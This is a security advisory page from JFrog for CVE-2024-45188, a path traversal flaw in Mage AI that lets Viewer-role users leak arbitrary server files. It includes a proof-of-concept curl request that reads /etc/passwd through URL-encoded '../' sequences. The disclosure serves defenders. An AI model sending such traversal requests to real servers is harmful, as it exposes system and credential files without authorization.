JFrog Security Research
< Back

JFSA-2024-001039603 - Mage AI file content request remote arbitrary file leak

CVE-2024-45188 | CVSS 6.5

JFrog Severity:medium

Discovered ByOri Hollanderof the JFrog Security Research Team

Published 23 Aug, 2024 | Last updated 23 Aug, 2024

Mage AI file content request remote arbitrary file leak

mage-ai

(,)

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "File Content" request

curl -X GET
'http://localhost:6789/api/file_contents/..%2F..%2F..%2Fetc%2Fpasswd?api_key=
<USER API KEY>' -H 'Authorization: Bearer
<USER TOKEN>'

No mitigations are supplied for this issue

No references are supplied for this issue

< Back